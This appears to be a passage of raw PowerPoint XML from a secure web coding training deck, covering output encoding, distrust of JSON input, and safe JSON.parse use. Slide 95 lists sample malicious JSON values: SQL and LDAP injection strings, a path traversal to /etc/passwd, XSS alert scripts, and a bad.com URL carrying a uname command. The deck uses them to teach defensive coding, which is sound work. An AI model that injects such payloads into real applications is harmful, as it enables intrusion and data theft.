                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>elem.textContent = '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="accent1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&lt;%= Encode.forJavaScript(request.getParameter("data")) %&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>';</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" kern="1200">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&lt;/script&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880" marR="18288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7206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 Client-Side JSON Handling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1486442492"/>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686800" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Should you trust all JSON? (no)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="146304" y="910694"/>
            <a:ext cx="8997696" cy="4800599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>{  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>	"' or 1=1-- ",</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>homepage"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>	"http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>www.bad.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>/packx1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>cs.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>?&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>=uname%20-a",</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>"username"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>	"*)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>=*))(|(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>=*",</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>"email"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>	"woot'or'1'!='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ing@manico.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>",</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>profile_image</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>	"../../../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>",</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>"location"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>	"(function() { alert('XSS 1!'); return 'somewhere'})()",</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>"bio"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>	"&lt;script type='text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>'&gt; alert ('XSS!'); &lt;/script&gt;"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="961697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JSON.parse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371599"/>
            <a:ext cx="8040029" cy="1393903"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The example below uses a secure example of using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XMLHTTPRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://example.com/items.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSON.parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to process the JSON that has successfully returned.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2475572"/>
            <a:ext cx="8686800" cy="4059044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
